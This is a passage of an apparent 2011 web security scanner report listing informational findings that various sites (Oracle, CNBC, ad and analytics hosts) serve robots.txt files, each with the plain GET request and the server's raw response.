Disallow: /docs/hts/
Disallow: /docs/
...[SNIP]...

26.41. http://edge.sapient.com/assets/images/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://edge.sapient.com
Path:	/assets/images/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: edge.sapient.com

Response

HTTP/1.0 200 OK
Content-Length: 125
Content-Type: text/plain
Last-Modified: Mon, 11 Oct 2010 06:11:21 GMT
Accept-Ranges: bytes
ETag: "bb8e5420b69cb1:1edd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=86400
Date: Tue, 06 Sep 2011 15:32:34 GMT
Connection: close

User-agent: *
Disallow: /admin
Disallow: /awards

# Sitemap Auto-Discovery
Sitemap: http://www.sapient.com/sitemap.xml

26.42. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getCourseDesc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://education.oracle.com
Path:	/pls/web_prod-plq-dad/db_pages.getCourseDesc

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: education.oracle.com

Response

HTTP/1.1 200 OK
ETag: "397990-dd-4cdd1e91"
Content-Type: text/plain
Last-Modified: Fri, 12 Nov 2010 11:01:37 GMT
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (G;max-age=0+0;age=0;ecid=72057716563588584,1)
Content-Length: 221
Date: Sat, 03 Sep 2011 05:33:20 GMT
Accept-Ranges: bytes

# no robots are allowed to access this site
User-agent: *
Disallow: /cgi-bin/checkout/
Disallow: /cgi-bin/shopcart/
Disallow: /pls/web_prod-plq-dad/show_desc.call_addcart

SITEMAP: http://education.o
...[SNIP]...

26.43. https://education.oracle.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://education.oracle.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: education.oracle.com

Response

HTTP/1.1 200 OK
ETag: "397990-dd-4cdd1e91"
Content-Type: text/plain
Last-Modified: Fri, 12 Nov 2010 11:01:37 GMT
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (G;max-age=0+0;age=0;ecid=144115297717247222,1)
Content-Length: 221
Date: Sat, 03 Sep 2011 05:33:20 GMT
Accept-Ranges: bytes

# no robots are allowed to access this site
User-agent: *
Disallow: /cgi-bin/checkout/
Disallow: /cgi-bin/shopcart/
Disallow: /pls/web_prod-plq-dad/show_desc.call_addcart

SITEMAP: http://education.o
...[SNIP]...

26.44. http://event.on24.com/r.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://event.on24.com
Path:	/r.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: event.on24.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:40 GMT
Server: Apache
Last-Modified: Fri, 21 Nov 2008 01:10:07 GMT
Accept-Ranges: bytes
Content-Length: 1433
Cache-Control: no-cache,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /clients/
Disallow: /demos/
Disallow: /images/
Disallow: /includes/
Disallow: /interface/
Disallow: /media/
Disallow: /vutils/
Disallow: /custom/
Disallow: /eventManag
...[SNIP]...

26.45. https://event.on24.com/eventRegistration/prereg/register.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://event.on24.com
Path:	/eventRegistration/prereg/register.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: event.on24.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:41 GMT
Server: Apache
Last-Modified: Fri, 21 Nov 2008 01:10:07 GMT
Accept-Ranges: bytes
Content-Length: 1433
Cache-Control: no-cache,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /clients/
Disallow: /demos/
Disallow: /images/
Disallow: /includes/
Disallow: /interface/
Disallow: /media/
Disallow: /vutils/
Disallow: /custom/
Disallow: /eventManag
...[SNIP]...

26.46. http://events.oracle.com/search/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.oracle.com
Path:	/search/search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: events.oracle.com

Response

HTTP/1.0 200 OK
Last-Modified: Sat, 13 Aug 2011 05:06:38 GMT
ETag: "6e8a13-57-4aa5bfea7d380"
Content-Type: text/plain
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.4.0 (G;max-age=0+0;age=0;ecid=4342557318426269,0:1)
Date: Tue, 06 Sep 2011 17:06:41 GMT
Content-Length: 87
Connection: close

# /robots.txt for events.oracle.com and pressroom.oracle.com
User-agent: *
Disallow: /

26.47. http://executivevision.cnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://executivevision.cnbc.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: executivevision.cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 02 Jun 2011 21:22:02 GMT
Accept-Ranges: bytes
ETag: "079141d6b21cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Connection: Keep-Alive
Date: Fri, 02 Sep 2011 02:41:37 GMT
Age: 192
Content-Length: 157

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.msn.com/xml/msnbc/SitemapIndex.xml

26.48. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 06 Sep 2011 17:06:41 GMT
Server: Floodlight server
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

26.49. http://fonts.googleapis.com/css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fonts.googleapis.com
Path:	/css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fonts.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:32:32 GMT
Expires: Tue, 06 Sep 2011 15:32:32 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /

26.50. https://forms.netsuite.com/app/site/crm/externalleadpage.nl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://forms.netsuite.com
Path:	/app/site/crm/externalleadpage.nl

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: forms.netsuite.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:35:00 GMT
Server: Apache
Content-Length: 103
Last-Modified: Thu, 25 Aug 2011 22:59:41 GMT
NS_RTIMER_COMPOSITE: -1700478872:616363742D6A6176613030362E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=997
Connection: Keep-Alive
Content-Type: text/plain

# Allow all robots to spider everything by disallowing nothing

User-agent: *
Crawl-Delay: 20
Disallow:

26.51. https://forums.oracle.com/forums/style/style.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://forums.oracle.com
Path:	/forums/style/style.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: forums.oracle.com

Response

HTTP/1.0 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Wed, 04 Mar 2009 13:24:21 GMT
ETag: "724018-f4b-49ae8105"
Accept-Ranges: bytes
Content-Length: 3915
Content-Type: text/plain
Date: Tue, 06 Sep 2011 16:13:18 GMT
Connection: close
X-N: S

#robots.txt for forums.oracle.com
# Last update: 04/18/2006 by Sdureja
User-agent: *
Disallow: /forums/guestsettings!default.jspa
Disallow: /forums/usersettings!default.jspa
Disallow: /forums/login.js
...[SNIP]...

26.52. http://img-cdn.mediaplex.com/0/17353/universal.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img-cdn.mediaplex.com
Path:	/0/17353/universal.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img-cdn.mediaplex.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sat, 10 Mar 2007 17:40:16 GMT
ETag: "1384e1-1a-42b5608766000"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain; charset=ISO-8859-1
Date: Tue, 06 Sep 2011 15:37:46 GMT
Connection: close
X-N: S

User-agent: *
Disallow: /

26.53. http://imp.fetchback.com/serve/fb/adtag.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: imp.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:16 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

##
## Created: June 10th 2007. (nikolas@codesquare.com)
## Updated: November 16th 2007. (nikolas@codesquare.com)
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Di
...[SNIP]...

26.54. http://intelligence.marykay.com/b/ss/marykaycom,marykayusglobal/1/H.23.3/s11730084258597 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://intelligence.marykay.com
Path:	/b/ss/marykaycom,marykayusglobal/1/H.23.3/s11730084258597

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: intelligence.marykay.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:51 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "134235-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www287
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.55. http://keywords.fmpub.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://keywords.fmpub.net
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: keywords.fmpub.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:54 GMT
Server: Apache/2.2
Last-Modified: Thu, 07 Oct 2010 02:57:58 GMT
Accept-Ranges: bytes
Content-Length: 26
X-Server: adserver12.tor.fmpub.net
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

26.56. http://l.addthiscdn.com/live/t00/250lo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://l.addthiscdn.com
Path:	/live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Jun 2011 11:39:23 GMT
ETag: "df8ab7-1b-4a51dabdf10c0"
Content-Type: text/plain; charset=UTF-8
Date: Tue, 06 Sep 2011 15:32:48 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

26.57. http://l.apture.com/v3/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://l.apture.com
Path:	/v3/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.apture.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 27
Date: Tue, 06 Sep 2011 15:33:12 GMT
Connection: close

User-agent: *
Disallow: /

26.58. http://legolas.nexac.com/lgalt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://legolas.nexac.com
Path:	/lgalt

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: legolas.nexac.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:59:37 GMT
Server: Apache
Last-Modified: Sun, 27 Mar 2011 17:04:30 GMT
ETag: "c5812d-1b-49f79d2014380"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

26.59. http://m.cnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.cnbc.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: m.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:46 GMT
Server: Apache
Last-Modified: Thu, 18 Mar 2010 23:04:19 GMT
ETag: "128030-636-4821b402902c0"
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Expires: Tue, 20 Sep 2011 15:04:46 GMT
Vary: Accept-Encoding
Content-Type: text/plain
Via: 1.1 aicache6
Content-Length: 1590
X-Aicache-OS: 64.210.193.250:80
Connection: Keep-Alive
Keep-Alive: max=20

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.60. https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://myprofile.oracle.com
Path:	/EndUser/faces/profile/createUser.jspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: myprofile.oracle.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:21 GMT
ETag: "1c9cc2a-1a-48898138d56e1"
Accept-Ranges: bytes
Content-Type: text/plain
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30186750711919769,1)
Last-Modified: Wed, 09 Jun 2010 12:30:51 GMT
Content-Length: 26

User-Agent: *
Disallow: /

26.61. http://netsuite-www.baynote.net/baynote/customerstatus2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://netsuite-www.baynote.net
Path:	/baynote/customerstatus2

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: netsuite-www.baynote.net

Response

HTTP/1.1 200 OK
Server: BNServer
Accept-Ranges: bytes
ETag: W/"216-1315320601000"
Last-Modified: Tue, 06 Sep 2011 14:50:01 GMT
Content-Type: text/plain
Content-Length: 216
Date: Tue, 06 Sep 2011 15:37:54 GMT
Connection: close

User-agent: *
Disallow: /baynote/
Disallow: /error400.html
Disallow: /error403.html
Disallow: /error404.html
Disallow: /error500.html
Disallow: /index.jsp
Disallow: /search/
Disallow: /socialsearch/
D
...[SNIP]...

26.62. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://netsuite.tt.omtrdc.net
Path:	/m2/netsuite/mbox/standard

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: netsuite.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:32:28 GMT
Accept-Ranges: bytes
ETag: W/"25-1309299047000"
Connection: close
Last-Modified: Tue, 28 Jun 2011 22:10:47 GMT
Content-Length: 25

User-agent: *
Disallow: /

26.63. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Volusion2011test/Retargeting_Homepage_Nonsecure@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_nx.ads/TRACK_Volusion2011test/Retargeting_Homepage_Nonsecure@Bottom3

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: network.realmedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Tue, 31 Mar 2009 16:50:50 GMT
ETag: "18d11c-1a-4666d0056ce80"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0d45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 15:35:10 GMT;path=/;httponly

User-agent: *
Disallow: /

26.64. http://now.eloqua.com/visitor/v200/svrGP.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://now.eloqua.com
Path:	/visitor/v200/svrGP.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/plain
Last-Modified: Fri, 19 Aug 2011 17:48:38 GMT
Accept-Ranges: bytes
ETag: "09f8539985ecc1:0"
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Tue, 06 Sep 2011 15:32:13 GMT
Connection: keep-alive
Content-Length: 44

# do not index
User-agent: *
Disallow: /

26.65. http://oimg.m.cnbc.com/b/ss/nbcucnbcwapbu,nbcuwapsitebu/5/H.8--WAP/543473694 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oimg.m.cnbc.com
Path:	/b/ss/nbcucnbcwapbu,nbcuwapsitebu/5/H.8--WAP/543473694

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: oimg.m.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:07:49 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "241115-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www63
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.66. http://oimg.nbcuni.com/b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s06181409736163 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oimg.nbcuni.com
Path:	/b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s06181409736163

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: oimg.nbcuni.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:56:45 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "e5150-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www285
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.67. http://omni.csc.com/b/ss/csccom/1/H.15.1/s04067904318217 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://omni.csc.com
Path:	/b/ss/csccom/1/H.15.1/s04067904318217

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: omni.csc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:45 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "18c593-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www370
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.68. http://oracle.112.2o7.net/b/ss/oraclecom,oracleglobal/1/H.23.3/s05522931320592 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oracle.112.2o7.net
Path:	/b/ss/oraclecom,oracleglobal/1/H.23.3/s05522931320592

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: oracle.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:06 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "215158-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www381
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.69. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oracleglobal.112.2o7.net
Path:	/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: oracleglobal.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:26 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "1b5c9e-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www81
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.70. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oracleuniversity.112.2o7.net
Path:	/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: oracleuniversity.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:01:45 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "1c912f-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www383
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.71. https://oracleus.wingateweb.com/portal/newreg.ww previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://oracleus.wingateweb.com
Path:	/portal/newreg.ww

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: oracleus.wingateweb.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:15 GMT
Server: Apache
Last-Modified: Tue, 28 Mar 2006 18:01:29 GMT
ETag: "e10ba4-1a-41011e167b040"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

26.72. http://pagead2.googlesyndication.com/pagead/imgad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pagead2.googlesyndication.com
Path:	/pagead/imgad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:00:53 GMT
Expires: Wed, 07 Sep 2011 15:00:53 GMT
Cache-Control: public, max-age=86400
Server: cafe
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

26.73. http://pg.links.channelintelligence.com/pages/CBLJS.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pg.links.channelintelligence.com
Path:	/pages/CBLJS.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pg.links.channelintelligence.com

Response

HTTP/1.0 200 OK
Content-Length: 93
Content-Type: text/plain
Last-Modified: Sun, 18 Jul 2004 16:06:59 GMT
Accept-Ranges: bytes
ETag: "80132b41e16cc41:289d"
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:35 GMT
Connection: close

User-agent: * # applies to all robots
Disallow: / # disallow indexing of all pages

26.74. http://pg.links.origin.channelintelligence.com/pages/wl.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pg.links.origin.channelintelligence.com
Path:	/pages/wl.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pg.links.origin.channelintelligence.com

Response

HTTP/1.1 200 OK
Content-Length: 93
Content-Type: text/plain
Last-Modified: Sun, 18 Jul 2004 16:06:59 GMT
Accept-Ranges: bytes
ETag: "80132b41e16cc41:2501"
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:38 GMT
Connection: close

User-agent: * # applies to all robots
Disallow: / # disallow indexing of all pages

26.75. http://pi.pardot.com/analytics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pi.pardot.com
Path:	/analytics

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pi.pardot.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:04 GMT
Server: Apache
Last-Modified: Thu, 27 Mar 2008 15:50:33 GMT
ETag: "1a"
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=63072000
Expires: Thu, 05 Sep 2013 15:32:04 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain; charset=UTF-8
X-Pardot-LB: lb-d2
Connection: close

#User-agent: *
#Disallow:

26.76. http://pixel.everesttech.net/1688/i previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.everesttech.net
Path:	/1688/i

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.everesttech.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:08:45 GMT
Server: Apache
Vary: X-EF-Forwarded-For
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "2051145-23-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 35
Keep-Alive: timeout=15, max=998861
Connection: Keep-Alive
Content-Type: text/plain

User-agent: Googlebot
Disallow: /

26.77. http://pixel.fetchback.com/serve/fb/pdc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/serve/fb/pdc

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:29 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

##
## Created: June 10th 2007. (nikolas@codesquare.com)
## Updated: November 16th 2007. (nikolas@codesquare.com)
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Di
...[SNIP]...

26.78. http://pixel.mathtag.com/event/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/event/img

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x4 pid 0x7f3a 32570
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *

26.79. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 07 Sep 2011 14:56:57 GMT
Content-Type: text/plain
Content-Length: 26
Date: Tue, 06 Sep 2011 14:56:57 GMT
Server: QS

User-agent: *
Disallow: /

26.80. http://r.casalemedia.com/j.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.casalemedia.com
Path:	/j.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Sep 2010 18:44:55 GMT
ETag: "15683a6-1a-cb0517c0"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Expires: Tue, 06 Sep 2011 15:37:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:37:47 GMT
Connection: close

User-agent: *
Disallow: /

26.81. http://rd.rlcdn.com/rd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rd.rlcdn.com
Path:	/rd

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rd.rlcdn.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 26
Last-Modified: Mon, 05 Sep 2011 19:31:28 GMT

User-Agent: *
Disallow: /

26.82. http://reviews.gillettevenus.com/4746/00047400302457/reviews.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://reviews.gillettevenus.com
Path:	/4746/00047400302457/reviews.htm

Issue detail

The web server contains a robots.txt file.

Request

